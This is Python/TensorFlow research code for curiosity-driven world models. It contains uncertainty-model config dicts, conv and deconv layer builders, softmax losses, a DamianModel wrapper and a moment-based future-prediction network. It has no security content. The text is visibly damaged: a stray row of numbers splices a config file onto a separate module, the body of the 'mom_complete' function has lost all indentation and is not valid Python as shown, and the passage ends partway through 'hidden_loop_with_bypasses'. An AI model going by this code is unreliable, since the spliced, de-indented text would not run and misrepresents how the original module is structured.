# one of the world-model configs above, plus an RNG seed.
sample_cfg = {
    'uncertainty_model' : {
        'state_shape' : [2, 64, 64, 3],
        'action_dim' : 8,
        'n_action_samples' : 50,
        'encode' : {
            'encode_depth' : 3,
            'encode' : {
                1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
                2 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 10}},
                3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
            }
        },
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                2 : {'num_features' : 1, 'activation' : 'identity'}
            }
        }
    },
    'world_model' : sample_depth_future_cfg,
    'seed' : 0
}

# Same shape of config with a deeper 5-layer uncertainty encoder and the
# bigger world model.
another_sample_cfg = {
    'uncertainty_model' : {
        'state_shape' : [2, 64, 64, 3],
        'action_dim' : 8,
        'n_action_samples' : 50,
        'encode' : {
            'encode_depth' : 5,
            'encode' : {
                1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
                3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
                5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
            }
        },
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                2 : {'num_features' : 1, 'activation' : 'identity'}
            }
        }
    },
    'world_model' : a_bigger_depth_future_config,
    'seed' : 0
}

# Full config for the Damian world model: larger input images (128x170).
default_damian_full_cfg = {
    'uncertainty_model' : {
        'state_shape' : [2, 128, 170, 3],
        'action_dim' : 8,
        'n_action_samples' : 50,
        'encode' : {
            'encode_depth' : 5,
            'encode' : {
                1 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                2 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 20}},
                3 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 20}},
                4 : {'conv' : {'filter_size' : 3, 'stride' : 1, 'num_filters' : 10}},
                5 : {'conv' : {'filter_size' : 3, 'stride' : 2, 'num_filters' : 5}},
            }
        },
        'mlp' : {
            'hidden_depth' : 2,
            'hidden' : {1 : {'num_features' : 20, 'dropout' : .75},
                2 : {'num_features' : 1, 'activation' : 'identity'}
            }
        }
    },
    'world_model' : default_damian_cfg,
    'seed' : 0
}
| 45.446161 | 239 | 0.591772 | '''
Policy and intrinsic reward models.
'''
import numpy as np
import tensorflow as tf
from curiosity.models.model_building_blocks import ConvNetwithBypasses
from curiosity.models import explicit_future_prediction_base as fp_base
from curiosity.models import jerk_models
import distutils.version
use_tf1 = distutils.version.LooseVersion(tf.VERSION) >= distutils.version.LooseVersion('1.0.0')
def tf_concat(list_of_tensors, axis = 0):
    """Version-agnostic concat: TF >= 1.0 takes (values, axis); older TF
    takes (axis, values)."""
    if not use_tf1:
        return tf.concat(axis, list_of_tensors)
    return tf.concat(list_of_tensors, axis)
#TODO replace all these makeshift helpers
def normalized_columns_initializer(std=1.0):
    """Return a TF initializer whose columns have Euclidean norm `std`."""
    def _initializer(shape, dtype=None, partition_info=None):
        sample = np.random.randn(*shape).astype(np.float32)
        # Rescale so each column's L2 norm equals std.
        sample *= std / np.sqrt(np.square(sample).sum(axis=0, keepdims=True))
        return tf.constant(sample)
    return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None, reuse_weights = False):
    """2-D convolution layer with Glorot/Xavier uniform weight init.

    Creates (or reuses, if reuse_weights) variables "W" and "b" under the
    variable scope `name` and returns the pre-activation conv output plus
    the weight and bias variables as a (output, w, b) tuple.
    """
    with tf.variable_scope(name, reuse = reuse_weights):
        stride_shape = [1, stride[0], stride[1], 1]
        # Filter shape: [h, w, in_channels, out_channels].
        filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
        # there are "num input feature maps * filter height * filter width"
        # inputs to each hidden unit
        fan_in = np.prod(filter_shape[:3])
        # each unit in the lower layer receives a gradient from:
        # "num output feature maps * filter height * filter width" /
        # pooling size
        fan_out = np.prod(filter_shape[:2]) * num_filters
        # initialize weights with random weights (Glorot uniform bound)
        w_bound = np.sqrt(6. / (fan_in + fan_out))
        w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
                            collections=collections)
        b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.constant_initializer(0.0),
                            collections=collections)
        return tf.nn.conv2d(x, w, stride_shape, pad) + b, w, b
def linear(x, size, name, initializer=None, bias_init=0):
    """Fully-connected layer; returns (output, weights, bias)."""
    in_dim = x.get_shape()[1]
    w = tf.get_variable(name + "/w", [in_dim, size], initializer=initializer)
    b = tf.get_variable(name + "/b", [size], initializer=tf.constant_initializer(bias_init))
    return tf.matmul(x, w) + b, w, b
class UniformActionSampler:
    """Draws fixed-size batches of actions uniformly from [-1, 1]^action_dim.

    The action dimensionality comes from cfg['world_model'] ('act_dim' if
    present, otherwise the second entry of 'action_shape'); the batch size
    from cfg['uncertainty_model']['n_action_samples'].
    """

    def __init__(self, cfg):
        wm_cfg = cfg['world_model']
        if 'act_dim' in wm_cfg:
            self.action_dim = wm_cfg['act_dim']
        else:
            self.action_dim = wm_cfg['action_shape'][1]
        self.num_actions = cfg['uncertainty_model']['n_action_samples']
        # Seeded RNG so sampling is reproducible across runs.
        self.rng = np.random.RandomState(cfg['seed'])

    def sample_actions(self):
        """Return a (num_actions, action_dim) array of uniform samples."""
        return self.rng.uniform(-1., 1., [self.num_actions, self.action_dim])
def postprocess_depths(depths):
    '''
    Assumes depths is of shape [batch_size, time_number, height, width, 3]

    Decodes the three channels as base-256 fixed-point depth in millimeters,
    converts to meters, then divides by 4 as normalization.
    '''
    depths = tf.cast(depths, tf.float32)
    depths = (depths[:,:,:,:,0:1] * 256. + depths[:,:,:,:,1:2] + \
        depths[:,:,:,:,2:3] / 256.0) / 1000.0
    depths /= 4. # normalization
    return depths
def postprocess_std(in_node):
    """Cast an 8-bit-style image tensor to float32 scaled into [0, 1]."""
    return tf.cast(in_node, tf.float32) / 255.
def flatten(x):
    """Collapse all dimensions except the batch dimension."""
    trailing = np.prod(x.get_shape().as_list()[1:])
    return tf.reshape(x, [-1, trailing])
def categorical_sample(logits, d, one_hot = True):
    """Sample one class index per row of `logits`; optionally one-hot with
    depth `d`. Logits are max-shifted for numerical stability."""
    shifted = logits - tf.reduce_max(logits, [1], keep_dims=True)
    value = tf.squeeze(tf.multinomial(shifted, 1), [1])
    return tf.one_hot(value, d) if one_hot else value
def deconv_loop(input_node, m, cfg, desc = 'deconv', bypass_nodes = None,
        reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False, do_print = True, return_bypass=False, sub_bypass = None):
    """Build a stack of deconvolution layers on `m` (a ConvNetwithBypasses)
    driven by the config dict `cfg[desc]`.

    Each layer may pull "bypass" (skip) connections from earlier outputs;
    the bypass spec can be an int index, a list of indices, or a dict keyed
    by sub_bypass. Returns the list of layer outputs, plus the accumulated
    bypass node list when return_bypass is True.
    """
    m.output = input_node
    deconv_nodes = [input_node]
    # deconvolving
    deconv_depth = cfg[desc + '_depth']
    cfs0 = None
    if bypass_nodes is None:
        bypass_nodes = [m.output]
    for i in range(1, deconv_depth + 1):
        with tf.variable_scope(desc + str(i)) as scope:
            if reuse_weights:
                scope.reuse_variables()
            bypass = cfg[desc][i].get('bypass')
            if bypass is not None:
                if type(bypass) == list:
                    bypass_node = [bypass_nodes[bp] for bp in bypass]
                elif type(bypass) == dict:
                    if sub_bypass is None:
                        raise ValueError('Bypass \
is dict but no sub_bypass specified')
                    for k in bypass:
                        if int(k) == sub_bypass:
                            if type(bypass[k]) == list:
                                bypass_node = [bypass_nodes[bp] \
                                    for bp in bypass[k]]
                            else:
                                bypass_node = bypass_nodes[bypass[k]]
                else:
                    bypass_node = bypass_nodes[bypass]
                m.add_bypass(bypass_node)
            # Per-layer batch-norm flag overrides the function-level default.
            bn = cfg[desc][i]['deconv'].get('batch_normalize')
            if bn:
                norm_it = bn
            else:
                norm_it = batch_normalize
            with tf.contrib.framework.arg_scope([m.deconv],
                    init='xavier', stddev=.01, bias=0, batch_normalize = norm_it):
                cfs = cfg[desc][i]['deconv']['filter_size']
                cfs0 = cfs
                nf = cfg[desc][i]['deconv']['num_filters']
                cs = cfg[desc][i]['deconv']['stride']
                if 'output_shape' in cfg[desc][i]['deconv']:
                    out_shape = cfg[desc][i]['deconv']['output_shape']
                else:
                    out_shape = None
                # Optionally drop the nonlinearity on the last layer.
                if no_nonlinearity_end and i == deconv_depth:
                    m.deconv(nf, cfs, cs, activation = None,
                        fixed_output_shape=out_shape)
                else:
                    my_activation = cfg[desc][i].get('nonlinearity')
                    if my_activation is None:
                        my_activation = 'relu'
                    m.deconv(nf, cfs, cs, activation = my_activation,
                        fixed_output_shape=out_shape)
                if do_print:
                    print('deconv out:', m.output)
                #TODO add print function
                pool = cfg[desc][i].get('pool')
                if pool:
                    pfs = pool['size']
                    ps = pool['stride']
                    m.pool(pfs, ps)
            deconv_nodes.append(m.output)
            bypass_nodes.append(m.output)
    if return_bypass:
        return [deconv_nodes, bypass_nodes]
    return deconv_nodes
def feedforward_conv_loop(input_node, m, cfg, desc = 'encode', bypass_nodes = None, reuse_weights = False, batch_normalize = False, no_nonlinearity_end = False, do_print=True, return_bypass=False, sub_bypass = None):
    """Build a stack of convolution layers on `m` driven by `cfg[desc]`.

    Mirrors deconv_loop: optional bypass (skip) inputs per layer (int, list,
    or sub_bypass-keyed dict), per-layer batch-norm override, optional
    pooling, and optional linear final layer. Returns the list of layer
    outputs, plus the bypass node list when return_bypass is True.
    """
    m.output = input_node
    encode_nodes = [input_node]
    #encoding
    encode_depth = cfg[desc + '_depth']
    cfs0 = None
    if bypass_nodes is None:
        bypass_nodes = [m.output]
    for i in range(1, encode_depth + 1):
        #not sure this usage ConvNet class creates exactly the params that we want to have, specifically in the 'input' field, but should give us an accurate record of this network's configuration
        with tf.variable_scope(desc + str(i)) as scope:
            if reuse_weights:
                scope.reuse_variables()
            bypass = cfg[desc][i].get('bypass')
            if bypass:
                if type(bypass) == list:
                    bypass_node = [bypass_nodes[bp] for bp in bypass]
                elif type(bypass) == dict:
                    if sub_bypass is None:
                        raise ValueError('Bypass \
is dict but no sub_bypass specified')
                    for k in bypass:
                        if int(k) == sub_bypass:
                            if type(bypass[k]) == list:
                                bypass_node = [bypass_nodes[bp] \
                                    for bp in bypass[k]]
                            else:
                                bypass_node = bypass_nodes[bypass[k]]
                else:
                    bypass_node = bypass_nodes[bypass]
                m.add_bypass(bypass_node)
            # Per-layer batch-norm flag overrides the function-level default.
            bn = cfg[desc][i]['conv'].get('batch_normalize')
            if bn:
                norm_it = bn
            else:
                norm_it = batch_normalize
            with tf.contrib.framework.arg_scope([m.conv], init='xavier', stddev=.01, bias=0, batch_normalize = norm_it):
                cfs = cfg[desc][i]['conv']['filter_size']
                cfs0 = cfs
                nf = cfg[desc][i]['conv']['num_filters']
                cs = cfg[desc][i]['conv']['stride']
                # Optionally drop the nonlinearity on the last layer.
                if no_nonlinearity_end and i == encode_depth:
                    m.conv(nf, cfs, cs, activation = None)
                else:
                    my_activation = cfg[desc][i].get('nonlinearity')
                    if my_activation is None:
                        my_activation = 'relu'
                    m.conv(nf, cfs, cs, activation = my_activation)
            #TODO add print function
            pool = cfg[desc][i].get('pool')
            if pool:
                pfs = pool['size']
                ps = pool['stride']
                m.pool(pfs, ps)
            encode_nodes.append(m.output)
            bypass_nodes.append(m.output)
    if return_bypass:
        return [encode_nodes, bypass_nodes]
    return encode_nodes
def action_softmax_loss(prediction, tv, num_classes = 21, min_value = -1., max_value = 1.):
    """Softmax classification loss over uniformly discretized targets.

    `tv` holds continuous values in [min_value, max_value] with shape
    [batch, k]; `prediction` holds flat logits of shape
    [batch, k * num_classes]. Each target is binned into one of num_classes
    buckets and scored with sparse softmax cross-entropy.

    Returns (per-example loss of shape [batch, 1], scalar mean loss).
    """
    # get into the right shape
    tv_shape = tv.get_shape().as_list()
    pred_shape = prediction.get_shape().as_list()
    print(tv_shape)
    print(pred_shape)
    assert len(tv_shape) == 2 and tv_shape[1] * num_classes == pred_shape[1], (len(tv_shape), tv_shape[1] * num_classes, pred_shape[1])
    pred = tf.reshape(prediction, [-1, tv_shape[1], num_classes])
    # discretize tv into integer bucket ids
    tv = float(num_classes) * (tv - min_value) / (max_value - min_value)
    tv = tf.cast(tv, tf.int32)
    # BUGFIX: tv == max_value previously mapped to label num_classes, which is
    # out of range for sparse_softmax_cross_entropy_with_logits; clamp labels
    # into the valid range [0, num_classes - 1] (also guards out-of-range tv).
    tv = tf.clip_by_value(tv, 0, num_classes - 1)
    loss_per_example = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels = tv, logits = pred), axis = 1, keep_dims = True)
    loss = tf.reduce_mean(loss_per_example)
    return loss_per_example, loss
def softmax_cross_entropy_loss_vel_one(outputs, tv, gpu_id = 0, eps = 0.0,
        min_value = -1.0, max_value = 1.0, num_classes=256,
        segmented_jerk=True, **kwargs):
    """Per-pixel softmax cross-entropy between predicted next-image logits
    (outputs['next_images'][1][0], num_classes buckets per RGB channel) and
    integer targets `tv`.

    The `undersample` branch (currently hard-disabled) would mask examples
    by jerk magnitude. gpu_id/eps/segmented_jerk are accepted but unused in
    this code path.
    """
    #with tf.device('/gpu:%d' % gpu_id):
    undersample = False
    if undersample:
        # Keep only examples whose jerk norm exceeds a threshold in either
        # of the first two time steps.
        thres = 0.5412
        mask = tf.norm(outputs['jerk_all'], ord='euclidean', axis=2)
        mask = tf.cast(tf.logical_or(tf.greater(mask[:,0], thres),
            tf.greater(mask[:,1], thres)), tf.float32)
        mask = tf.reshape(mask, [mask.get_shape().as_list()[0], 1, 1, 1])
    else:
        mask = 1
    shape = outputs['pred_next_vel_1'].get_shape().as_list()
    assert shape[3] / 3 == num_classes
    losses = []
    # next image losses
    logits = outputs['next_images'][1][0]
    # Split the channel axis into (3 color channels, num_classes buckets).
    logits = tf.reshape(logits, shape[0:3] + [3, shape[3] / 3])
    labels = tf.cast(tv, tf.int32)
    loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels=labels, logits=logits) * mask)
    losses.append(loss)
    assert len(losses) == 1, ('loss length: %d' % len(losses))
    losses = tf.stack(losses)
    return tf.reduce_mean(losses)
# Base world-model config: the "momentum complete bypass" network from
# jerk_models (concat joining, relu), extended with input shapes.
default_damian_cfg = jerk_models.cfg_mom_complete_bypass(768, use_segmentation=False,
        method='concat', nonlin='relu')
default_damian_cfg.update({'state_shape' : [2, 128, 170, 3], 'action_shape' : [2, 8]})
class DamianModel:
    """Wraps the mom_complete world model: builds placeholders for the
    initial/final states, object-id maps, and actions, preprocesses them via
    replace_base, and exposes prediction and loss tensors."""

    def __init__(self, cfg = None, time_seen = 3):
        # Placeholders; state_shape presumably [time, H, W, 3] — TODO confirm.
        self.s_i = x = tf.placeholder(tf.float32, [1] + cfg['state_shape'])
        self.s_f = s_f = tf.placeholder(tf.float32, [1] + cfg['state_shape'])
        self.objects = objects = tf.placeholder(tf.float32, [1] + cfg['state_shape'])
        self.action = action = tf.placeholder(tf.float32, [1, 2, cfg['action_dim']])
        self.action_id = action_id = tf.placeholder(tf.int32, [1, 2])
        bs = tf.to_float(tf.shape(self.s_i)[0])
        # Append the last frame of s_f to s_i along the time axis.
        final_img_unsqueezed = self.s_f[:, 1:]
        depths = tf_concat([self.s_i, final_img_unsqueezed], 1)
        inputs = replace_base(depths, objects, action, action_id)
        self.processed_input = inputs
        # NOTE(review): dict.iteritems is Python 2-only.
        for k, inpt in inputs.iteritems():
            print(k)
            print(inpt)
        #then gotta postprocess things to be of the right form, get a thing called inputs out of it
        self.model_results, _ = mom_complete(inputs, cfg = cfg, time_seen = time_seen)
        self.pred = self.model_results['next_images']
        self.tv = inputs['tv']
        self.loss = softmax_cross_entropy_loss_vel_one(self.model_results, self.tv, segmented_jerk = False, buckets = 255)
def replace_base(depths, objects, action, action_id):
    """Preprocess raw depth/object/action tensors into mom_complete inputs.

    Pads and resizes depth and object images to 64x88, decodes the 3-channel
    object image into integer object ids, builds a per-pixel action map
    (force components broadcast onto the acted-on object's pixels, plus
    ego-motion broadcast everywhere), and returns a dict with 'actions_map',
    postprocessed 'depths', and the training target 'tv' (last raw depth
    frame).
    """
    inputs = {'depths' : depths, 'objects' : objects, 'actions' : action}
    rinputs = {}
    for k in inputs:
        if k in ['depths', 'objects']:
            # Pad width by 3 on each side before resizing.
            rinputs[k] = tf.pad(inputs[k],
                [[0,0], [0,0], [0,0], [3,3], [0,0]], "CONSTANT")
            # RESIZING IMAGES
            rinputs[k] = tf.unstack(rinputs[k], axis=1)
            for i, _ in enumerate(rinputs[k]):
                rinputs[k][i] = tf.image.resize_images(rinputs[k][i], [64, 88])
            rinputs[k] = tf.stack(rinputs[k], axis=1)
        else:
            rinputs[k] = inputs[k]
    # Decode RGB object image into a single integer id per pixel (base 256).
    objects = tf.cast(rinputs['objects'], tf.int32)
    shape = objects.get_shape().as_list()
    objects = tf.unstack(objects, axis=len(shape)-1)
    objects = objects[0] * (256**2) + objects[1] * 256 + objects[2]
    # Broadcast the acted-on object's id over all pixels, then mark the
    # pixels belonging to that object.
    action_id = tf.expand_dims(action_id, 2)
    action_id = tf.cast(tf.reshape(tf.tile(action_id, [1, 1, shape[2] * shape[3]]), shape[:-1]), tf.int32)
    actions = tf.cast(tf.equal(objects, action_id), tf.float32)
    # Paint the 6 force components onto the object's pixels.
    actions = tf.tile(tf.expand_dims(actions, axis = 4), [1, 1, 1, 1, 6])
    actions *= tf.expand_dims(tf.expand_dims(action[:, :, 2:], 2), 2)
    # First two action components are ego-motion, broadcast to every pixel.
    ego_motion = tf.expand_dims(tf.expand_dims(action[:, :, :2], 2), 2)
    ego_motion = tf.tile(ego_motion, [1, 1, shape[2], shape[3], 1])
    action_map = tf_concat([actions, ego_motion], -1)
    action_map = tf.expand_dims(action_map, -1)
    inputs = {'actions_map' : action_map, 'depths' : postprocess_depths(rinputs['depths']), 'tv' : rinputs['depths'][:, -1] }
    return inputs
def mom_complete(inputs, cfg = None, time_seen = None, normalization_method = None,
stats_file = None, obj_pic_dims = None, scale_down_height = None,
scale_down_width = None, add_depth_gaussian = False, add_gaussians = False,
include_pose = False, store_jerk = True, use_projection = False,
num_classes = None, keep_prob = None, gpu_id = 0, **kwargs):
#print('------NETWORK START-----')
#with tf.device('/gpu:%d' % gpu_id):
# rescale inputs to be divisible by 8
#rinputs = {}
#for k in inputs:
# if k in ['depths', 'objects', 'vels', 'accs', 'jerks',
# 'vels_curr', 'accs_curr', 'actions_map', 'segmentation_map']:
# rinputs[k] = tf.pad(inputs[k],
# [[0,0], [0,0], [0,0], [3,3], [0,0]], "CONSTANT")
# # RESIZING IMAGES
# rinputs[k] = tf.unstack(rinputs[k], axis=1)
# for i, _ in enumerate(rinputs[k]):
# rinputs[k][i] = tf.image.resize_images(rinputs[k][i], [64, 88])
# rinputs[k] = tf.stack(rinputs[k], axis=1)
# else:
# rinputs[k] = inputs[k]
# preprocess input data
batch_size, time_seen, height, width = \
inputs['depths'].get_shape().as_list()[:4]
time_seen -= 1
long_len = time_seen + 1
#base_net = fp_base.ShortLongFuturePredictionBase(
# rinputs, store_jerk = store_jerk,
# normalization_method = normalization_method,
# time_seen = time_seen, stats_file = stats_file,
# scale_down_height = scale_down_height,
# scale_down_width = scale_down_width,
# add_depth_gaussian = add_depth_gaussian,
# add_gaussians = add_gaussians,
# get_hacky_segmentation_map = True,
# get_actions_map = True)
#inputs = base_net.inputs
# init network
m = ConvNetwithBypasses(**kwargs)
# encode per time step
main_attributes = ['depths']
main_input_per_time = [tf_concat([tf.cast(inputs[nm][:, t], tf.float32) \
for nm in main_attributes], axis = 3) for t in range(time_seen)]
# init projection matrix
if use_projection:
print('Using PROJECTION')
with tf.variable_scope('projection'):
P = tf.get_variable(name='P',
initializer=tf.eye(4),
#shape=[4, 4],
dtype=tf.float32)
# initial bypass
bypass_nodes = [[b] for b in tf.unstack(inputs['depths'][:,:time_seen], axis=1)]
# use projection
if use_projection:
for t in range(time_seen):
main_input_per_time[t] = apply_projection(main_input_per_time[t], P)
#bypass_nodes[t].append(main_input_per_time[t])
# conditioning
if 'use_segmentation' in cfg:
use_segmentation = cfg['use_segmentation']
else:
use_segmentation = False
print('Using ACTION CONDITIONING')
cond_attributes = ['actions_map']
if use_segmentation:
print('Using segmentations as conditioning')
cond_attributes.append('segmentation_map')
if 'cond_scale_factor' in cfg:
scale_factor = cfg['cond_scale_factor']
else:
scale_factor = 1
for att in cond_attributes:
if att in ['actions_map']:
inputs[att] = tf.reduce_sum(inputs[att], axis=-1, keep_dims=False)
if att in ['segmentation_map']:
inputs[att] = tf.reduce_sum(inputs[att], axis=-1, keep_dims=True)
shape = inputs[att].get_shape().as_list()
inputs[att] = tf.unstack(inputs[att], axis=1)
for t, _ in enumerate(inputs[att]):
inputs[att][t] = tf.image.resize_images(inputs[att][t],
[shape[2]/scale_factor, shape[3]/scale_factor],
method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
inputs[att] = tf.stack(inputs[att], axis=1)
cond_input_per_time = [tf_concat([inputs[nm][:, t] \
for nm in cond_attributes], axis = 3) for t in range(time_seen)]
encoded_input_cond = []
reuse_weights = False
print('right before bug loop')
for inpt in cond_input_per_time:
print(inpt)
for t in range(time_seen):
enc, bypass_nodes[t] = feedforward_conv_loop(
cond_input_per_time[t], m, cfg, desc = 'cond_encode',
bypass_nodes = bypass_nodes[t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True)
encoded_input_cond.append(enc[-1])
reuse_weights = True
# main
encoded_input_main = []
reuse_weights = False
for t in range(time_seen):
enc, bypass_nodes[t] = feedforward_conv_loop(
main_input_per_time[t], m, cfg, desc = 'main_encode',
bypass_nodes = bypass_nodes[t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True)
encoded_input_main.append(enc[-1])
reuse_weights = True
# calculate moments
bypass_nodes = [bypass_nodes]
moments = [encoded_input_main]
reuse_weights = False
assert time_seen-1 > 0, ('len(time_seen) = 0')
for i, mom in enumerate(range(time_seen-1, 0, -1)):
sub_bypass_nodes = []
for t in range(mom):
bn = []
for node in bypass_nodes[i][t]:
bn.append(node)
sub_bypass_nodes.append(bn)
bypass_nodes.append(sub_bypass_nodes)
sub_moments = []
for t in range(mom):
sm = moments[i]
if cfg['combine_moments'] == 'minus':
print('Using MINUS')
enc = sm[t+1] - sm[t]
elif cfg['combine_moments'] == 'concat':
print('Using CONCAT')
enc = tf_concat([sm[t+1], sm[t]], axis=3)
enc, bypass_nodes[i+1][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'combine_moments_encode',
bypass_nodes = bypass_nodes[i+1][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
enc = enc[-1]
enc, bypass_nodes[i+1][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'moments_encode',
bypass_nodes = bypass_nodes[i+1][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
sub_moments.append(enc[-1])
reuse_weights = True
moments.append(sub_moments)
# concat moments, main and cond
currents = []
reuse_weights = False
for i, moment in enumerate(moments):
sub_currents = []
for t, _ in enumerate(moment):
enc = tf_concat([moment[t],
encoded_input_main[t+i], #TODO first moments are main inputs already!
encoded_input_cond[t+i]], axis=3)
enc, bypass_nodes[i][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'moments_main_cond_encode',
bypass_nodes = bypass_nodes[i][t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
sub_currents.append(enc[-1])
reuse_weights = True
currents.append(sub_currents)
# predict next moments via residuals (delta moments)
next_moments = []
delta_moments = []
reuse_weights = False
for i, current in enumerate(currents):
next_moment = []
delta_moment = []
for t, _ in enumerate(current):
dm, bypass_nodes[i][t] = feedforward_conv_loop(
current[t], m, cfg, desc = 'delta_moments_encode',
bypass_nodes = bypass_nodes[i][t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
if cfg['combine_delta'] == 'plus':
print('Using PLUS')
nm = current[t] + dm[-1]
elif cfg['combine_delta'] == 'concat':
print('Using CONCAT')
nm = tf_concat([current[t], dm[-1]], axis=3)
nm, bypass_nodes[i][t] = feedforward_conv_loop(
nm, m, cfg, desc = 'combine_delta_encode',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
nm = nm[-1]
else:
raise KeyError('Unknown combine_delta')
reuse_weights = True
delta_moment.append(dm[-1])
next_moment.append(nm)
next_moments.append(next_moment)
delta_moments.append(delta_moment)
# concat next moments and main and reconstruct
nexts = []
reuse_weights = False
for i, moment in enumerate(next_moments):
sub_nexts = []
for t, _ in enumerate(moment):
# TODO: first moments are main inputs already!
# -> no need to concat for i == 0
# TODO: Higher moment reconstruction needs additional layers
# to match dimensions -> depth + vel + acc to next vel
# vs depth + vel to next depth -> only vel possible so far!
enc = tf_concat([moment[t], encoded_input_main[t+i]], axis=3)
enc, bypass_nodes[i][t] = feedforward_conv_loop(
enc, m, cfg, desc = 'next_main_encode',
bypass_nodes = bypass_nodes[i][t], reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print=(not reuse_weights), return_bypass = True,
sub_bypass = i)
reuse_weights = True
sub_nexts.append(enc[-1])
nexts.append(sub_nexts)
# Deconvolution
num_deconv = cfg.get('deconv_depth')
reuse_weights = False
if num_deconv:
for i, moment in enumerate(moments):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
for i, moment in enumerate(next_moments):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
for i, moment in enumerate(delta_moments):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
for i, moment in enumerate(nexts):
for t, _ in enumerate(moment):
enc, bypass_nodes[i][t] = deconv_loop(
moment[t], m, cfg, desc='deconv',
bypass_nodes = bypass_nodes[i][t],
reuse_weights = reuse_weights,
batch_normalize = False, no_nonlinearity_end = False,
do_print = True, return_bypass = True,
sub_bypass = i)
moment[t] = enc[-1]
reuse_weights = True
retval = {
'pred_vel_1': moments[1][0],
'pred_delta_vel_1': delta_moments[1][0],
'pred_next_vel_1': next_moments[1][0],
'pred_next_img_1': nexts[1][0],
#'pred_next_vel_2': next_moments[0][1],
'bypasses': bypass_nodes,
'moments': moments,
'delta_moments': delta_moments,
'next_moments': next_moments,
'next_images': nexts
}
retval.update(inputs)
print('------NETWORK END-----')
print('------BYPASSES-------')
for i, node in enumerate(bypass_nodes[1][0]):
print(i, bypass_nodes[1][0][i])
for i, mn in enumerate(bypass_nodes):
for j, tn in enumerate(mn):
print('------LENGTH------', i, j, len(tn))
#for k, bn in enumerate(tn):
# print(i, j, k, bn)
print(len(bypass_nodes))
return retval, m.params
def hidden_loop_with_bypasses(input_node, m, cfg, nodes_for_bypass = None, stddev = .01, reuse_weights = False, activation = 'relu', train = True):
    """Build a stack of fully connected layers (with optional bypasses) on `m`.

    Args:
        input_node: rank-2 tensor (batch, features) fed to the first layer.
        m: model builder (ConvNetwithBypasses); layers are added via m.fc.
        cfg: dict with 'hidden_depth' and per-layer config under cfg['hidden'][i]
            ('num_features', optional 'bypass' index, 'activation', 'dropout').
        nodes_for_bypass: optional list of candidate bypass tensors; each new
            layer output is appended to it. Defaults to a fresh list per call.
        stddev: weight-init stddev passed to m.fc.
        reuse_weights: reuse variables in each 'hidden<i>' scope.
        activation: default activation when a layer does not specify one.
        train: if False, dropout is disabled for every layer.

    Returns:
        The output tensor of the last hidden layer (m.output).
    """
    # NOTE: previously the default was a shared mutable list ([]), so bypass
    # nodes accumulated across *separate* calls; use a per-call list instead.
    if nodes_for_bypass is None:
        nodes_for_bypass = []
    assert len(input_node.get_shape().as_list()) == 2, len(input_node.get_shape().as_list())
    hidden_depth = cfg['hidden_depth']
    m.output = input_node
    for i in range(1, hidden_depth + 1):
        print(m.output.get_shape().as_list())
        with tf.variable_scope('hidden' + str(i)) as scope:
            if reuse_weights:
                scope.reuse_variables()
